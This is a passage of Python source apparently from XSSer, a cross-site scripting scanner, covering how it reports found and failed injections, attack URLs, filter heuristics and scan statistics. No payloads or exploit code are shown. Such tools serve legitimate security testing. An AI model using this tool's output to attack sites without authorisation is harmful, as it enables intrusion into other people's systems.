  3288. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [WITHOUT --reverse-check VALIDATION!]\n\n")
  3289. else:
  3290. if self.token_arrived_flag == True:
  3291. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND! [100% VULNERABLE]\n\n")
  3292. else:
  3293. if self.options.reversecheck:
  3294. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND! [BUT --reverse-check VALIDATION has FAILED!]\n\n")
  3295. else:
  3296. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND! [WITHOUT --reverse-check VALIDATION!]\n\n")
  3297. else:
  3298. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3299. if self.token_arrived_flag == True:
  3300. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [100% VULNERABLE]\n\n")
  3301. else:
  3302. if self.options.reversecheck:
  3303. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [BUT --reverse-check VALIDATION has FAILED!]\n\n")
  3304. else:
  3305. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [WITHOUT --reverse-check VALIDATION!]\n\n")
  3306. else:
  3307. if self.token_arrived_flag == True:
  3308. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND! [100% VULNERABLE]\n\n")
  3309. else:
  3310. if self.options.reversecheck:
  3311. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND! [BUT --reverse-check VALIDATION has FAILED!]\n\n")
  3312. else:
  3313. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: MANUAL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Status: XSS FOUND! [WITHOUT --reverse-check VALIDATION!]\n\n")
  3314. fout.write("="*75 + "\n\n")
  3315. elif line[1] == "[Heuristic test]":
  3316. if len(self.hash_found) < 11:
  3317. if line[4]:
  3318. self.report("[+] Target:", line[6] + " | " + line[4])
  3319. else:
  3320. self.report("[+] Target:", line[6])
  3321. self.report("[+] Vector: [ " + str(line[3]) + " ]")
  3322. self.report("[!] Method:", line[2])
  3323. self.report("[*] Payload:", line[5])
  3324. self.report("[!] Status: NOT FILTERED!", "\n", '-'*50, "\n")
  3325. if self.options.fileoutput:
  3326. fout.write("="*75)
  3327. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3328. fout.write("="*75 + "\n\n")
  3329. for line in self.hash_found:
  3330. if line[4]:
  3331. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[3]) + " ]\n\n[!] Method: heuristic" + " \n\n[*] Payload: \n\n " + str(line[5]) + "\n\n[!] Status: NOT FILTERED!\n\n")
  3332. else:
  3333. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[3]) + " ]\n\n[!] Method: heuristic" + " \n\n[*] Payload: \n\n " + str(line[5]) + "\n\n[!] Status: NOT FILTERED!\n\n")
  3334. fout.write("="*75 + "\n\n")
  3335. else:
  3336. self.auto_found = self.auto_found + 1
  3337. if len(self.hash_found) < 11:
  3338. if line[4]: # when query string
  3339. self.report("[+] Target:", line[6] + " | " + line[4])
  3340. else:
  3341. self.report("[+] Target:", line[6])
  3342. self.report("[+] Vector: [ " + str(line[2]) + " ]")
  3343. self.report("[!] Method: URL")
  3344. self.report("[*] Hash:", line[3])
  3345. self.report("[*] Payload:", line[0])
  3346. self.report("[!] Vulnerable:", line[1])
  3347. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3348. self.report("[*] Final Attack:", attack_url)
  3349. if self.token_arrived_flag == True:
  3350. self.report("[!] Status: XSS FOUND! [100% VULNERABLE]", "\n", '-'*50, "\n")
  3351. else:
  3352. if self.options.reversecheck:
  3353. self.report("[!] Status: XSS FOUND! [BUT --reverse-check VALIDATION has FAILED!]", "\n", '-'*50, "\n")
  3354. else:
  3355. self.report("[!] Status: XSS FOUND! [WITHOUT --reverse-check VALIDATION!]", "\n", '-'*50, "\n")
  3356. if self.options.fileoutput:
  3357. fout.write("="*75)
  3358. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3359. fout.write("="*75 + "\n\n")
  3360. for line in self.hash_found:
  3361. if line[4]:
  3362. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3363. if self.token_arrived_flag == True:
  3364. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [100% VULNERABLE]\n\n")
  3365. else:
  3366. if self.options.reversecheck:
  3367. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [BUT --reverse-check VALIDATION has FAILED!]\n\n")
  3368. else:
  3369. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [WITHOUT --reverse-check VALIDATION!]\n\n")
  3370. else:
  3371. if self.token_arrived_flag == True:
  3372. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND! [100% VULNERABLE]\n\n")
  3373. else:
  3374. if self.options.reversecheck:
  3375. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND! [BUT --reverse-check VALIDATION has FAILED!]\n\n")
  3376. else:
  3377. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND! [WITHOUT --reverse-check VALIDATION!]\n\n")
  3378. else:
  3379. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3380. if self.token_arrived_flag == True:
  3381. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [100% VULNERABLE]\n\n")
  3382. else:
  3383. if self.options.reversecheck:
  3384. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [BUT --reverse-check VALIDATION has FAILED!]\n\n")
  3385. else:
  3386. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [WITHOUT --reverse-check VALIDATION!]\n\n")
  3387. else:
  3388. if self.token_arrived_flag == True:
  3389. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND! [100% VULNERABLE]\n\n")
  3390. else:
  3391. if self.options.reversecheck:
  3392. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND! [BUT --reverse-check VALIDATION has FAILED!]\n\n")
  3393. else:
  3394. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND! [WITHOUT --reverse-check VALIDATION!]\n\n")
  3395. fout.write("="*75 + "\n\n")
  3396. if self.options.fileoutput:
  3397. fout.close()
  3398. if self.options.fileoutput and not self.options.filexml:
  3399. self.report("[Info] Generating report: [ XSSreport.raw ]\n")
  3400. self.report("-"*25+"\n")
  3401. if self.options.fileoutput and self.options.filexml:
  3402. self.report("[Info] Generating report: [ XSSreport.raw ] | Exporting results to: [ " + str(self.options.filexml) + " ] \n")
  3403. self.report("-"*25+"\n")
  3404. if len(self.hash_found) > 10 and not self.options.fileoutput: # write results fo file when large output (white magic!)
  3405. if not self.options.filexml:
  3406. self.report("[Info] Aborting large screen output. Generating auto-report at: [ XSSreport.raw ] ;-)\n")
  3407. self.report("-"*25+"\n")
  3408. fout = open("XSSreport.raw", "w") # write better than append
  3409. fout.write("="*75)
  3410. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3411. fout.write("="*75 + "\n\n")
  3412. for line in self.hash_found:
  3413. if line[4]:
  3414. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3415. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  3416. else:
  3417. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
  3418. else:
  3419. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
  3420. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
  3421. else:
  3422. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
  3423. fout.write("="*75 + "\n\n")
  3424. fout.close()
  3425. else:
  3426. self.report("[Info] Exporting results to: [ " + str(self.options.filexml) + " ]\n")
  3427. self.report("-"*25+"\n")
  3428. # heuristic always with statistics
  3429. if self.options.heuristic:
  3430. heuris_semicolon_total_found = self.heuris_semicolon_found + self.heuris_une_semicolon_found + self.heuris_dec_semicolon_found
  3431. heuris_backslash_total_found = self.heuris_backslash_found + self.heuris_une_backslash_found + self.heuris_dec_backslash_found
  3432. heuris_slash_total_found = self.heuris_slash_found + self.heuris_une_slash_found + self.heuris_dec_slash_found
  3433. heuris_minor_total_found = self.heuris_minor_found + self.heuris_une_minor_found + self.heuris_dec_minor_found
  3434. heuris_mayor_total_found = self.heuris_mayor_found + self.heuris_une_mayor_found + self.heuris_dec_mayor_found
  3435. heuris_doublecolon_total_found = self.heuris_doublecolon_found + self.heuris_une_doublecolon_found + self.heuris_dec_doublecolon_found
  3436. heuris_colon_total_found = self.heuris_colon_found + self.heuris_une_colon_found + self.heuris_dec_colon_found
  3437. heuris_equal_total_found = self.heuris_equal_found + self.heuris_une_equal_found + self.heuris_dec_equal_found
  3438. total_heuris_found = heuris_semicolon_total_found + heuris_backslash_total_found + heuris_slash_total_found + heuris_minor_total_found + heuris_mayor_total_found + heuris_doublecolon_total_found + heuris_colon_total_found + heuris_equal_total_found
  3439. total_heuris_params = total_heuris_found + self.heuris_semicolon_found + self.heuris_backslash_found + self.heuris_slash_found + self.heuris_minor_found + self.heuris_mayor_found + self.heuris_doublecolon_found + self.heuris_colon_found + self.heuris_equal_found
  3440. total_heuris_notfound = self.heuris_semicolon_notfound + self.heuris_backslash_notfound + self.heuris_slash_notfound + self.heuris_minor_notfound + self.heuris_mayor_notfound + self.heuris_doublecolon_notfound + self.heuris_colon_notfound + self.heuris_equal_notfound
  3441. if total_heuris_notfound > 0: # not shown when not found
  3442. self.options.statistics = True
  3443. # some statistics reports
  3444. if self.options.statistics:
  3445. # heuristic test results
  3446. if self.options.heuristic:
  3447. self.report("\n"+'='*75)
  3448. self.report("[+] Heuristics:")
  3449. self.report('='*75)
  3450. test_time = datetime.datetime.now() - self.time
  3451. self.report("\n" + '-'*50)
  3452. self.report("Test Time Duration: ", test_time)
  3453. self.report('-'*50 )
  3454. total_connections = total_heuris_found + total_heuris_notfound
  3455. self.report("Total fuzzed:", total_connections)
  3456. self.report('-'*75)
  3457. self.report(' ', " <FILTERED!>", " <NOT FILTERED!>", " =" , " ASCII", "+", "UNE/HEX", "+", "DEC")
  3458. # semicolon results
  3459. self.report('; ', " ", self.heuris_semicolon_notfound, " ",
  3460. heuris_semicolon_total_found, " ",
  3461. self.heuris_semicolon_found, " ",
  3462. self.heuris_une_semicolon_found, " ",
  3463. self.heuris_dec_semicolon_found)
  3464. # backslash results
  3465. self.report('\\ ', " ", self.heuris_backslash_notfound, " ",
  3466. heuris_backslash_total_found, " ",
  3467. self.heuris_backslash_found, " ",
  3468. self.heuris_une_backslash_found, " ",
  3469. self.heuris_dec_backslash_found)
  3470. # slash results
  3471. self.report("/ ", " ", self.heuris_slash_notfound, " ",
  3472. heuris_slash_total_found, " ",
  3473. self.heuris_slash_found, " ",
  3474. self.heuris_une_slash_found, " ",
  3475. self.heuris_dec_slash_found)
  3476. # minor results
  3477. self.report("< ", " ", self.heuris_minor_notfound, " ",
  3478. heuris_minor_total_found, " ",
  3479. self.heuris_minor_found, " ",
  3480. self.heuris_une_minor_found, " ",
  3481. self.heuris_dec_minor_found)
  3482. # mayor results
  3483. self.report("> ", " ", self.heuris_mayor_notfound, " ",
  3484. heuris_mayor_total_found, " ",
  3485. self.heuris_mayor_found, " ",
  3486. self.heuris_une_mayor_found, " ",
  3487. self.heuris_dec_mayor_found)
  3488. # doublecolon results
  3489. self.report('" ', " ", self.heuris_doublecolon_notfound, " ",
  3490. heuris_doublecolon_total_found, " ",
  3491. self.heuris_doublecolon_found, " ",
  3492. self.heuris_une_doublecolon_found, " ",
  3493. self.heuris_dec_doublecolon_found)
  3494. # colon results
  3495. self.report("' ", " ", self.heuris_colon_notfound, " ",
  3496. heuris_colon_total_found, " ",
  3497. self.heuris_colon_found, " ",
  3498. self.heuris_une_colon_found, " ",
  3499. self.heuris_dec_colon_found)
  3500. # equal results
  3501. self.report("= ", " ", self.heuris_equal_notfound, " ",
  3502. heuris_equal_total_found, " ",
  3503. self.heuris_equal_found, " ",
  3504. self.heuris_une_equal_found, " ",
  3505. self.heuris_dec_equal_found)
  3506. self.report('-'*75)
  3507. try:
  3508. _accur = total_heuris_found * 100 / total_heuris_params
  3509. except ZeroDivisionError:
  3510. _accur = 0
  3511. self.report('Target(s) Filtering Accur: %s %%' % _accur)
  3512. self.report('-'*75)
  3513. # statistics block
  3514. if len(self.hash_found) + len(self.hash_notfound) == 0:
  3515. pass
  3516. if self.options.heuristic:
  3517. pass
  3518. else:
  3519. self.report('='*75)
  3520. self.report("[+] Statistics:")
  3521. self.report('='*75)
  3522. test_time = datetime.datetime.now() - self.time
  3523. self.report("\n" + '-'*50)
  3524. self.report("Test Time Duration: ", test_time)
  3525. self.report('-'*50 )
  3526. total_connections = self.success_connection + self.not_connection + self.forwarded_connection + self.other_connection
  3527. self.report("Total Connections:", total_connections)
  3528. self.report('-'*25)
  3529. self.report("200-OK:" , self.success_connection , "|", "404:" ,
  3530. self.not_connection , "|" , "503:" ,
  3531. self.forwarded_connection , "|" , "Others:",
  3532. self.other_connection)
  3533. try:
  3534. _accur = self.success_connection * 100 / total_connections
  3535. except ZeroDivisionError:
  3536. _accur = 0
  3537. self.report("Connec: %s %%" % _accur)
  3538. self.report('-'*50)
  3539. total_payloads = self.check_positives + self.manual_injection + self.auto_injection + self.dcp_injection + self.dom_injection + self.xsa_injection + self.xsr_injection + self.coo_injection
  3540. self.report("Total Payloads:", total_payloads)
  3541. self.report('-'*25)
  3542. self.report("Checker:", self.check_positives, "|", "Manual:",
  3543. self.manual_injection, "|" , "Auto:" ,
  3544. self.auto_injection ,"|", "DCP:",
  3545. self.dcp_injection, "|", "DOM:", self.dom_injection,
  3546. "|", "Induced:", self.httpsr_injection, "|" , "XSR:",
  3547. self.xsr_injection, "|", "XSA:",
  3548. self.xsa_injection , "|", "COO:",
  3549. self.coo_injection)
  3550. self.report('-'*50)
  3551. self.report("Total Injections:" ,
  3552. len(self.hash_notfound) + len(self.hash_found))
  3553. self.report('-'*25)
  3554. self.report("Failed:" , len(self.hash_notfound), "|",
  3555. "Successful:" , len(self.hash_found))
  3556. try:
  3557. _accur = len(self.hash_found) * 100 / total_injections
  3558. except ZeroDivisionError:
  3559. _accur = 0
  3560. self.report("Accur : %s %%" % _accur)
  3561. self.report("\n" + '='*50)
  3562. total_discovered = self.false_positives + self.manual_found + self.auto_found + self.dcp_found + self.dom_found + self.xsr_found + self.xsa_found + self.coo_found
  3563. self.report("\n" + '-'*50)
  3564. self.report("Total XSS Discovered:", total_discovered)
  3565. self.report('-'*50)
  3566. self.report("Checker:", self.false_positives, "|",
  3567. "Manual:",self.manual_found, "|", "Auto:",
  3568. self.auto_found, "|", "DCP:", self.dcp_found,
  3569. "|", "DOM:", self.dom_found, "|", "Induced:",
  3570. self.httpsr_found, "|" , "XSR:", self.xsr_found,
  3571. "|", "XSA:", self.xsa_found, "|", "COO:",
  3572. self.coo_found)
  3573. self.report('-'*50)
  3574. self.report("False positives:", self.false_positives, "|",
  3575. "Vulnerables:",
  3576. total_discovered - self.false_positives)
  3577. self.report('-'*25)
  3578. # efficiency ranking:
  3579. # algor= vulnerables + false positives - failed * extras
  3580. mana = 0
  3581. h_found = 0
  3582. for h in self.hash_found:
  3583. h_found = h_found + 1
  3584. if h_found > 3:
  3585. mana = mana + 4500
  3586. if h_found == 1:
  3587. mana = mana + 500
  3588. if self.options.reversecheck:
  3589. mana = mana + 200
  3590. if total_payloads > 100:
  3591. mana = mana + 150
  3592. if not self.options.xsser_gtk:
  3593. mana = mana + 25
  3594. if self.options.discode:
  3595. mana = mana + 100
  3596. if self.options.proxy:
  3597. mana = mana + 100
  3598. if self.options.threads > 9:
  3599. mana = mana + 100
  3600. if self.options.heuristic:
  3601. mana = mana + 100
  3602. if self.options.finalpayload or self.options.finalremote:
  3603. mana = mana + 100
  3604. if self.options.script:
  3605. mana = mana + 100
  3606. if self.options.Cem or self.options.Doo:
  3607. mana = mana + 75
  3608. if self.options.heuristic:
  3609. mana = mana + 50
  3610. if self.options.script and not self.options.fuzz:
  3611. mana = mana + 25
  3612. if self.options.followred and self.options.fli:
  3613. mana = mana + 25
  3614. if self.options.wizard:
  3615. mana = mana + 25
  3616. if self.options.dcp:
  3617. mana = mana + 25
  3618. if self.options.hash:
  3619. mana = mana + 10
  3620. mana = (len(self.hash_found) * mana) + mana
  3621. # enjoy it :)
  3622. self.report("Mana:", mana)
  3623. self.report("")
  3624. c = Curl()
  3625. if not len(self.hash_found) and self.hash_notfound:
  3626. if self.options.hash:
  3627. if self.options.statistics:
  3628. self.report('='*75 + '\n')
  3629. self.report("[Info] Target isn't replying to the input [ --hash ] sent!\n")
  3630. else:
  3631. if self.options.target or self.options.heuristic:
  3632. self.report("")
  3633. if self.options.heuristic:
  3634. pass
  3635. else:
  3636. if self.options.statistics:
  3637. self.report('='*75 + '\n')
  3638. if self.options.fileoutput:
  3639. fout = open("XSSreport.raw", "w") # write better than append
  3640. fout.write("="*75)
  3641. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
  3642. fout.write("="*75 + "\n\n")
  3643. for h in self.hash_notfound:
  3644. if h[2] == 'heuristic':
  3645. if not h[4]:
  3646. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + "\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n" + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
  3647. else:
  3648. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
  3649. elif h[2] == 'hashing check':
  3650. if not h[4]:
  3651. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + "\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n" + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
  3652. else:
  3653. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
  3654. else:
  3655. if h[4]:
  3656. if h[2] == "XSA":
  3657. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
  3658. elif h[2] == "XSR":
  3659. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
  3660. elif h[2] == "COO":
  3661. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
  3662. else:
  3663. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + h[1] + "\n\n[!] Status: XSS FAILED!\n\n")
  3664. else:
  3665. if h[2] == "XSA":
  3666. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
  3667. elif h[2] == "XSR":
  3668. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
  3669. elif h[2] == "COO":
  3670. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
  3671. else:
  3672. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + h[1] + "\n\n[!] Status: XSS FAILED!\n\n")
  3673. fout.write("="*75 + "\n\n")
  3674. fout.close()
  3675. else:
  3676. # some exits and info for some bad situations:
  3677. if len(self.hash_found) + len(self.hash_notfound) == 0 and not Exception:
  3678. self.report("\n[Error] XSSer cannot send any data... maybe -something- is blocking connection(s)!?\n")
  3679. if len(self.hash_found) + len(self.hash_notfound) == 0 and self.options.crawling:
  3680. if self.options.xsser_gtk:
  3681. self.report('='*75)
  3682. self.report("\n[Error] Not any feedback from crawler... Aborting! :(\n")
  3683. self.report('='*75 + '\n')
  3684. # print results to xml file
  3685. if self.options.filexml:
  3686. xml_report_results = xml_reporting(self)
  3687. try:
  3688. xml_report_results.print_xml_results(self.options.filexml)
  3689. except:
  3690. return
  3691. if __name__ == "__main__":
  3692. app = xsser()
  3693. options = app.create_options()
  3694. if options:
  3695. app.set_options(options)
  3696. app.run()
  3697. app.land(True)